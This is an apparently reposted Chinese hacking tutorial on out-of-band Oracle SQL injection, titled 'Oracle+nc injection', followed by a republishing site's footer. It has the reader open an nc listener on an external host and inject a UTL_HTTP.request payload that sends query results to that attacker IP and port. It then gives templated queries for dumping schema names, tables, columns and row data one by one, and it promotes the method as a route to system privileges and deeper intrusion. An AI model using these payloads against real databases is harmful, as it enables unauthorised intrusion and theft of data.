首先外网nc监听对应的端口
and UTL_HTTP.request('外网ip:port/'||(sql语句))=1-- |
爆库:
select owner from all_tables where rownum=1 select owner from all_tables where owner<>'第一个库名' and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第二个'and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第一个库名' and rownum=1 |
以此论推
爆表:
select TABLE_NAME from all_tables where owner='库名' and rownum=1 select TABLE_NAME from all_tables where owner='库名' and rownum=1 and TABLE_NAME<>'表名1' select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2' |
以此论推
爆列:
select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名' |
爆内容:
第一个内容:select 列名 from 表名 where rownum=1
第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值'
第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值'
以此论推
现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html
是不是很明了了...o(∩_∩)o...哈哈
注:
1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料
2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁
3.这是个系列文章,后文有待更新
当前题目:Oracle注射技术——Oracle+nc注射
网页链接:http://www.csdahua.cn/qtweb/news0/463900.html
网站建设、网络推广公司-快上网,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 快上网